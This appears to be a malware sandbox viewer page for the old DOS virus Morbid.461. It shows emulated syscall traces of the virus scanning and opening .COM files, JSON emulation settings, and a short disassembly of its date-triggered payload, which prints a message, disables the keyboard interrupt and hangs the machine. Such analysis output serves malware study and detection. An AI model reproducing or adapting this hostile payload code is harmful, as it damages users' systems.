Sample viewer

vx.netlux.org/Virus.DOS.IVP.Morbid.461

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-17T22:46:22.181456914Z 42 PC: 13ee5 | Get date 0x13ee5: cmp dh, 7
0x13ee8: jne 0x13eef
0x13eea: cmp dl, 2
0x13eed: je 0x13ef0
0x13eef: ret
0x13ef0: xor ax, ax
0x13ef2: xor dx, dx
0x13ef4: int 0x10
0x13ef6: mov ah, 9
0x13ef8: lea dx, word ptr [bp + 0x265]
0x13efc: int 0x21
0x13efe: in al, 0x21
0x13f00: or al, 2
0x13f02: out 0x21, al
0x13f04: jmp 0x13f04
0x13f06: mov dx, word ptr [bp + 0x29b]
0x13f0a: mov ax, 0x4300
0x13f0d: int 0x21
0x13f0f: lea bx, word ptr [bp + 0x28f]
0x13f13: mov word ptr [bx], cx
2018-12-17T22:46:22.18522357Z 47 PC: 13de4 | Get disk transfer address
2018-12-17T22:46:22.18746547Z 26 PC: 13df5 | Set disk transfer address
2018-12-17T22:46:22.189281764Z 78 PC: 13e08 | Find first file
2018-12-17T22:46:22.196514797Z 67 PC: 13f0f | Get or set file attributes
2018-12-17T22:46:22.204409088Z 67 PC: 13f1c | Get or set file attributes
2018-12-17T22:46:22.234542892Z 61 PC: 13e17 | Open file (Filename = 'SLEEP.COM')
2018-12-17T22:46:22.243975397Z 87 PC: 13e1f | Get or set file date and time
2018-12-17T22:46:22.247305398Z 63 PC: 13e3f | Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:46:22.255412482Z 66 PC: 13ee0 | Move file pointer
2018-12-17T22:46:22.25712718Z 62 PC: 13e82 | Close file
2018-12-17T22:46:22.260598279Z 79 PC: 13e86 | Find next file
2018-12-17T22:46:22.264494335Z 67 PC: 13f0f | Get or set file attributes
2018-12-17T22:46:22.271239457Z 67 PC: 13f1c | Get or set file attributes
2018-12-17T22:46:22.283183232Z 61 PC: 13e17 | Open file (Filename = 'PRINT.COM')
2018-12-17T22:46:22.291853307Z 87 PC: 13e1f | Get or set file date and time
2018-12-17T22:46:22.293941032Z 63 PC: 13e3f | Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:46:22.301281505Z 66 PC: 13ee0 | Move file pointer
2018-12-17T22:46:22.305478954Z 62 PC: 13e82 | Close file
2018-12-17T22:46:22.307838192Z 79 PC: 13e86 | Find next file
2018-12-17T22:46:22.311268255Z 67 PC: 13f0f | Get or set file attributes
2018-12-17T22:46:22.318990184Z 67 PC: 13f1c | Get or set file attributes
2018-12-17T22:46:22.330913742Z 61 PC: 13e17 | Open file (Filename = 'HELLO.COM')
2018-12-17T22:46:22.347711034Z 87 PC: 13e1f | Get or set file date and time
2018-12-17T22:46:22.362472013Z 63 PC: 13e3f | Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:46:22.370712881Z 66 PC: 13ee0 | Move file pointer
2018-12-17T22:46:22.373496108Z 62 PC: 13e82 | Close file
2018-12-17T22:46:22.376827154Z 79 PC: 13e86 | Find next file
2018-12-17T22:46:22.382796191Z 67 PC: 13f0f | Get or set file attributes
2018-12-17T22:46:22.389508685Z 67 PC: 13f1c | Get or set file attributes
2018-12-17T22:46:22.402977597Z 61 PC: 13e17 | Open file (Filename = 'PHANG.COM')
2018-12-17T22:46:22.426855358Z 87 PC: 13e1f | Get or set file date and time
2018-12-17T22:46:22.428801487Z 63 PC: 13e3f | Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:46:22.446856545Z 66 PC: 13ee0 | Move file pointer
2018-12-17T22:46:22.449895542Z 62 PC: 13e82 | Close file
2018-12-17T22:46:22.452342004Z 79 PC: 13e86 | Find next file
2018-12-17T22:46:22.456615945Z 67 PC: 13f0f | Get or set file attributes
2018-12-17T22:46:22.464440323Z 67 PC: 13f1c | Get or set file attributes
2018-12-17T22:46:22.475777823Z 61 PC: 13e17 | Open file (Filename = 'PRINTA~1.COM')
2018-12-17T22:46:22.483650096Z 87 PC: 13e1f | Get or set file date and time
2018-12-17T22:46:22.486599415Z 63 PC: 13e3f | Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:46:22.494494697Z 66 PC: 13ee0 | Move file pointer
2018-12-17T22:46:22.496503228Z 62 PC: 13e82 | Close file
2018-12-17T22:46:22.499657715Z 79 PC: 13e86 | Find next file
2018-12-17T22:46:22.503306423Z 67 PC: 13f0f | Get or set file attributes
2018-12-17T22:46:22.510002625Z 67 PC: 13f1c | Get or set file attributes
2018-12-17T22:46:22.521967447Z 61 PC: 13e17 | Open file (Filename = 'MANDEL.COM')
2018-12-17T22:46:22.530631979Z 87 PC: 13e1f | Get or set file date and time
2018-12-17T22:46:22.532653948Z 63 PC: 13e3f | Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:46:22.540186145Z 66 PC: 13ee0 | Move file pointer
2018-12-17T22:46:22.543264446Z 62 PC: 13e82 | Close file
2018-12-17T22:46:22.545714089Z 79 PC: 13e86 | Find next file
2018-12-17T22:46:22.549141018Z 67 PC: 13f0f | Get or set file attributes
2018-12-17T22:46:22.556693213Z 67 PC: 13f1c | Get or set file attributes
2018-12-17T22:46:22.564439734Z 61 PC: 13e17 | Open file (Filename = 'PAH.COM')
2018-12-17T22:46:22.569230695Z 87 PC: 13e1f | Get or set file date and time
2018-12-17T22:46:22.571284428Z 63 PC: 13e3f | Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:46:22.593079749Z 66 PC: 13ee0 | Move file pointer
2018-12-17T22:46:22.594897764Z 62 PC: 13e82 | Close file
2018-12-17T22:46:22.607292735Z 79 PC: 13e86 | Find next file
2018-12-17T22:46:22.610832589Z 67 PC: 13f0f | Get or set file attributes
2018-12-17T22:46:22.61729801Z 67 PC: 13f1c | Get or set file attributes
2018-12-17T22:46:22.642518899Z 61 PC: 13e17 | Open file (Filename = 'TEST.COM')
2018-12-17T22:46:22.651956948Z 87 PC: 13e1f | Get or set file date and time
2018-12-17T22:46:22.653933362Z 63 PC: 13e3f | Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:46:22.657329711Z 62 PC: 13e82 | Close file
2018-12-17T22:46:22.660465467Z 79 PC: 13e86 | Find next file
2018-12-17T22:46:22.663541903Z 26 PC: 13ec5 | Set disk transfer address
2018-12-17T22:46:22.665183374Z 9 PC: 13dc6 | Display string (String= 'CDEFG-This is a 5000 byte COM test, 1994 ')

{"DateBased":true,"Day":2,"Month":7,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":8861,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:22:07.002293747Z 42 PC: 13ee5 | Get date 0x13ee5: cmp dh, 7
0x13ee8: jne 0x13eef
0x13eea: cmp dl, 2
0x13eed: je 0x13ef0
0x13eef: ret
0x13ef0: xor ax, ax
0x13ef2: xor dx, dx
0x13ef4: int 0x10
0x13ef6: mov ah, 9
0x13ef8: lea dx, word ptr [bp + 0x265]
0x13efc: int 0x21
0x13efe: in al, 0x21
0x13f00: or al, 2
0x13f02: out 0x21, al
0x13f04: jmp 0x13f04
0x13f06: mov dx, word ptr [bp + 0x29b]
0x13f0a: mov ax, 0x4300
0x13f0d: int 0x21
0x13f0f: lea bx, word ptr [bp + 0x28f]
0x13f13: mov word ptr [bx], cx
2018-12-25T12:22:07.011746647Z 9 PC: 13efe | Display string (String= 'The MORBID(OS) virus V2.00')

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":8861,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:22:07.23076612Z 42 PC: 13ee5 | Get date 0x13ee5: cmp dh, 7
0x13ee8: jne 0x13eef
0x13eea: cmp dl, 2
0x13eed: je 0x13ef0
0x13eef: ret
0x13ef0: xor ax, ax
0x13ef2: xor dx, dx
0x13ef4: int 0x10
0x13ef6: mov ah, 9
0x13ef8: lea dx, word ptr [bp + 0x265]
0x13efc: int 0x21
0x13efe: in al, 0x21
0x13f00: or al, 2
0x13f02: out 0x21, al
0x13f04: jmp 0x13f04
0x13f06: mov dx, word ptr [bp + 0x29b]
0x13f0a: mov ax, 0x4300
0x13f0d: int 0x21
0x13f0f: lea bx, word ptr [bp + 0x28f]
0x13f13: mov word ptr [bx], cx
2018-12-25T12:22:07.233958625Z 47 PC: 13de4 | Get disk transfer address
2018-12-25T12:22:07.235027836Z 26 PC: 13df5 | Set disk transfer address
2018-12-25T12:22:07.236007292Z 78 PC: 13e08 | Find first file
2018-12-25T12:22:07.242690047Z 67 PC: 13f0f | Get or set file attributes
2018-12-25T12:22:07.253089079Z 67 PC: 13f1c | Get or set file attributes
2018-12-25T12:22:07.271040559Z 61 PC: 13e17 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:22:07.282314837Z 87 PC: 13e1f | Get or set file date and time
2018-12-25T12:22:07.283954339Z 63 PC: 13e3f | Read file or device (Read 4 bytes on handle 5)
2018-12-25T12:22:07.290424234Z 66 PC: 13ee0 | Move file pointer
2018-12-25T12:22:07.291648699Z 62 PC: 13e82 | Close file
2018-12-25T12:22:07.294211226Z 79 PC: 13e86 | Find next file
2018-12-25T12:22:07.296809337Z 67 PC: 13f0f | Get or set file attributes (See above)
2018-12-25T12:22:07.302167012Z 67 PC: 13f1c | Get or set file attributes (See above)
2018-12-25T12:22:07.324704334Z 61 PC: 13e17 | Open file (See above)
2018-12-25T12:22:07.33130198Z 87 PC: 13e1f | Get or set file date and time (See above)
2018-12-25T12:22:07.332574435Z 63 PC: 13e3f | Read file or device (See above)
2018-12-25T12:22:07.339646375Z 66 PC: 13ee0 | Move file pointer (See above)
2018-12-25T12:22:07.341177777Z 62 PC: 13e82 | Close file (See above)
2018-12-25T12:22:07.342973364Z 79 PC: 13e86 | Find next file (See above)
2018-12-25T12:22:07.34640029Z 67 PC: 13f0f | Get or set file attributes (See above)
2018-12-25T12:22:07.35218997Z 67 PC: 13f1c | Get or set file attributes (See above)
2018-12-25T12:22:07.362576375Z 61 PC: 13e17 | Open file (See above)
2018-12-25T12:22:07.370640103Z 87 PC: 13e1f | Get or set file date and time (See above)
2018-12-25T12:22:07.372018944Z 63 PC: 13e3f | Read file or device (See above)
2018-12-25T12:22:07.378317962Z 66 PC: 13ee0 | Move file pointer (See above)
2018-12-25T12:22:07.380073699Z 62 PC: 13e82 | Close file (See above)
2018-12-25T12:22:07.382705434Z 79 PC: 13e86 | Find next file (See above)
2018-12-25T12:22:07.385617641Z 67 PC: 13f0f | Get or set file attributes (See above)
2018-12-25T12:22:07.391417925Z 67 PC: 13f1c | Get or set file attributes (See above)
2018-12-25T12:22:07.404618407Z 61 PC: 13e17 | Open file (See above)
2018-12-25T12:22:07.411714014Z 87 PC: 13e1f | Get or set file date and time (See above)
2018-12-25T12:22:07.413546162Z 63 PC: 13e3f | Read file or device (See above)
2018-12-25T12:22:07.420632077Z 66 PC: 13ee0 | Move file pointer (See above)
2018-12-25T12:22:07.421976007Z 62 PC: 13e82 | Close file (See above)
2018-12-25T12:22:07.423687872Z 79 PC: 13e86 | Find next file (See above)
2018-12-25T12:22:07.426924993Z 67 PC: 13f0f | Get or set file attributes (See above)
2018-12-25T12:22:07.432763677Z 67 PC: 13f1c | Get or set file attributes (See above)
2018-12-25T12:22:07.442765138Z 61 PC: 13e17 | Open file (See above)
2018-12-25T12:22:07.450005277Z 87 PC: 13e1f | Get or set file date and time (See above)
2018-12-25T12:22:07.451674769Z 63 PC: 13e3f | Read file or device (See above)
2018-12-25T12:22:07.458564466Z 66 PC: 13ee0 | Move file pointer (See above)
2018-12-25T12:22:07.460756651Z 62 PC: 13e82 | Close file (See above)
2018-12-25T12:22:07.462571272Z 79 PC: 13e86 | Find next file (See above)
2018-12-25T12:22:07.46559442Z 67 PC: 13f0f | Get or set file attributes (See above)
2018-12-25T12:22:07.472045624Z 67 PC: 13f1c | Get or set file attributes (See above)
2018-12-25T12:22:07.48199235Z 61 PC: 13e17 | Open file (See above)
2018-12-25T12:22:07.488448496Z 87 PC: 13e1f | Get or set file date and time (See above)
2018-12-25T12:22:07.490533775Z 63 PC: 13e3f | Read file or device (See above)
2018-12-25T12:22:07.496865317Z 66 PC: 13ee0 | Move file pointer (See above)
2018-12-25T12:22:07.49834335Z 62 PC: 13e82 | Close file (See above)
2018-12-25T12:22:07.500785686Z 79 PC: 13e86 | Find next file (See above)
2018-12-25T12:22:07.503464857Z 67 PC: 13f0f | Get or set file attributes (See above)
2018-12-25T12:22:07.509023019Z 67 PC: 13f1c | Get or set file attributes (See above)
2018-12-25T12:22:07.519129854Z 61 PC: 13e17 | Open file (See above)
2018-12-25T12:22:07.525711371Z 87 PC: 13e1f | Get or set file date and time (See above)
2018-12-25T12:22:07.527338918Z 63 PC: 13e3f | Read file or device (See above)
2018-12-25T12:22:07.534263694Z 66 PC: 13ee0 | Move file pointer (See above)
2018-12-25T12:22:07.535887054Z 62 PC: 13e82 | Close file (See above)
2018-12-25T12:22:07.537840059Z 79 PC: 13e86 | Find next file (See above)
2018-12-25T12:22:07.542174274Z 67 PC: 13f0f | Get or set file attributes (See above)
2018-12-25T12:22:07.547992306Z 67 PC: 13f1c | Get or set file attributes (See above)
2018-12-25T12:22:07.557853619Z 61 PC: 13e17 | Open file (See above)
2018-12-25T12:22:07.565052761Z 87 PC: 13e1f | Get or set file date and time (See above)
2018-12-25T12:22:07.566538885Z 63 PC: 13e3f | Read file or device (See above)
2018-12-25T12:22:07.573136326Z 62 PC: 13e82 | Close file (See above)
2018-12-25T12:22:07.575250511Z 79 PC: 13e86 | Find next file (See above)
2018-12-25T12:22:07.576997059Z 26 PC: 13ec5 | Set disk transfer address
2018-12-25T12:22:07.577814608Z 9 PC: 13dc6 | Display string (String= 'CDEFG-This is a 5000 byte COM test, 1994 ')

{"DateBased":true,"Day":1,"Month":7,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":8861,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T13:07:11.68917761Z 42 PC: 13ee5 | Get date 0x13ee5: cmp dh, 7
0x13ee8: jne 0x13eef
0x13eea: cmp dl, 2
0x13eed: je 0x13ef0
0x13eef: ret
0x13ef0: xor ax, ax
0x13ef2: xor dx, dx
0x13ef4: int 0x10
0x13ef6: mov ah, 9
0x13ef8: lea dx, word ptr [bp + 0x265]
0x13efc: int 0x21
0x13efe: in al, 0x21
0x13f00: or al, 2
0x13f02: out 0x21, al
0x13f04: jmp 0x13f04
0x13f06: mov dx, word ptr [bp + 0x29b]
0x13f0a: mov ax, 0x4300
0x13f0d: int 0x21
0x13f0f: lea bx, word ptr [bp + 0x28f]
0x13f13: mov word ptr [bx], cx
2018-12-25T13:07:11.691718053Z 47 PC: 13de4 | Get disk transfer address
2018-12-25T13:07:11.692783607Z 26 PC: 13df5 | Set disk transfer address
2018-12-25T13:07:11.693780187Z 78 PC: 13e08 | Find first file
2018-12-25T13:07:11.699874463Z 67 PC: 13f0f | Get or set file attributes
2018-12-25T13:07:11.705249788Z 67 PC: 13f1c | Get or set file attributes
2018-12-25T13:07:11.723378981Z 61 PC: 13e17 | Open file (Filename = 'SLEEP.COM')
2018-12-25T13:07:11.734551361Z 87 PC: 13e1f | Get or set file date and time
2018-12-25T13:07:11.735938399Z 63 PC: 13e3f | Read file or device (Read 4 bytes on handle 5)
2018-12-25T13:07:11.742461243Z 66 PC: 13ee0 | Move file pointer
2018-12-25T13:07:11.74553482Z 62 PC: 13e82 | Close file
2018-12-25T13:07:11.747212891Z 79 PC: 13e86 | Find next file
2018-12-25T13:07:11.749668969Z 67 PC: 13f0f | Get or set file attributes (See above)
2018-12-25T13:07:11.755966096Z 67 PC: 13f1c | Get or set file attributes (See above)
2018-12-25T13:07:11.762293064Z 61 PC: 13e17 | Open file (See above)
2018-12-25T13:07:11.766394901Z 87 PC: 13e1f | Get or set file date and time (See above)
2018-12-25T13:07:11.767590995Z 63 PC: 13e3f | Read file or device (See above)
2018-12-25T13:07:11.771624773Z 66 PC: 13ee0 | Move file pointer (See above)
2018-12-25T13:07:11.772598234Z 62 PC: 13e82 | Close file (See above)
2018-12-25T13:07:11.773712167Z 79 PC: 13e86 | Find next file (See above)
2018-12-25T13:07:11.776106325Z 67 PC: 13f0f | Get or set file attributes (See above)
2018-12-25T13:07:11.780094635Z 67 PC: 13f1c | Get or set file attributes (See above)
2018-12-25T13:07:11.789338336Z 61 PC: 13e17 | Open file (See above)
2018-12-25T13:07:11.800965909Z 87 PC: 13e1f | Get or set file date and time (See above)
2018-12-25T13:07:11.802190501Z 63 PC: 13e3f | Read file or device (See above)
2018-12-25T13:07:11.808630737Z 66 PC: 13ee0 | Move file pointer (See above)
2018-12-25T13:07:11.810517679Z 62 PC: 13e82 | Close file (See above)
2018-12-25T13:07:11.812060429Z 79 PC: 13e86 | Find next file (See above)
2018-12-25T13:07:11.814512329Z 67 PC: 13f0f | Get or set file attributes (See above)
2018-12-25T13:07:11.820422402Z 67 PC: 13f1c | Get or set file attributes (See above)
2018-12-25T13:07:11.830027678Z 61 PC: 13e17 | Open file (See above)
2018-12-25T13:07:11.836432533Z 87 PC: 13e1f | Get or set file date and time (See above)
2018-12-25T13:07:11.838143508Z 63 PC: 13e3f | Read file or device (See above)
2018-12-25T13:07:11.844269418Z 66 PC: 13ee0 | Move file pointer (See above)
2018-12-25T13:07:11.845511794Z 62 PC: 13e82 | Close file (See above)
2018-12-25T13:07:11.847691958Z 79 PC: 13e86 | Find next file (See above)
2018-12-25T13:07:11.850132298Z 67 PC: 13f0f | Get or set file attributes (See above)
2018-12-25T13:07:11.855580144Z 67 PC: 13f1c | Get or set file attributes (See above)
2018-12-25T13:07:11.86841034Z 61 PC: 13e17 | Open file (See above)
2018-12-25T13:07:11.875365239Z 87 PC: 13e1f | Get or set file date and time (See above)
2018-12-25T13:07:11.876596222Z 63 PC: 13e3f | Read file or device (See above)
2018-12-25T13:07:11.883081801Z 66 PC: 13ee0 | Move file pointer (See above)
2018-12-25T13:07:11.884310097Z 62 PC: 13e82 | Close file (See above)
2018-12-25T13:07:11.8858453Z 79 PC: 13e86 | Find next file (See above)
2018-12-25T13:07:11.888640231Z 67 PC: 13f0f | Get or set file attributes (See above)
2018-12-25T13:07:11.893904403Z 67 PC: 13f1c | Get or set file attributes (See above)
2018-12-25T13:07:11.90066584Z 61 PC: 13e17 | Open file (See above)
2018-12-25T13:07:11.907679232Z 87 PC: 13e1f | Get or set file date and time (See above)
2018-12-25T13:07:11.909017762Z 63 PC: 13e3f | Read file or device (See above)
2018-12-25T13:07:11.915329972Z 66 PC: 13ee0 | Move file pointer (See above)
2018-12-25T13:07:11.917256873Z 62 PC: 13e82 | Close file (See above)
2018-12-25T13:07:11.918903171Z 79 PC: 13e86 | Find next file (See above)
2018-12-25T13:07:11.921326218Z 67 PC: 13f0f | Get or set file attributes (See above)
2018-12-25T13:07:11.927719278Z 67 PC: 13f1c | Get or set file attributes (See above)
2018-12-25T13:07:11.940049096Z 61 PC: 13e17 | Open file (See above)
2018-12-25T13:07:11.94628474Z 87 PC: 13e1f | Get or set file date and time (See above)
2018-12-25T13:07:11.947935184Z 63 PC: 13e3f | Read file or device (See above)
2018-12-25T13:07:11.954047291Z 66 PC: 13ee0 | Move file pointer (See above)
2018-12-25T13:07:11.955309965Z 62 PC: 13e82 | Close file (See above)
2018-12-25T13:07:11.957345274Z 79 PC: 13e86 | Find next file (See above)
2018-12-25T13:07:11.959769281Z 67 PC: 13f0f | Get or set file attributes (See above)
2018-12-25T13:07:11.96530275Z 67 PC: 13f1c | Get or set file attributes (See above)
2018-12-25T13:07:11.976041183Z 61 PC: 13e17 | Open file (See above)
2018-12-25T13:07:11.982642473Z 87 PC: 13e1f | Get or set file date and time (See above)
2018-12-25T13:07:11.984106395Z 63 PC: 13e3f | Read file or device (See above)
2018-12-25T13:07:11.99102989Z 62 PC: 13e82 | Close file (See above)
2018-12-25T13:07:11.992995369Z 79 PC: 13e86 | Find next file (See above)
2018-12-25T13:07:11.995463454Z 26 PC: 13ec5 | Set disk transfer address
2018-12-25T13:07:11.996978079Z 9 PC: 13dc6 | Display string (String= 'CDEFG-This is a 5000 byte COM test, 1994 ')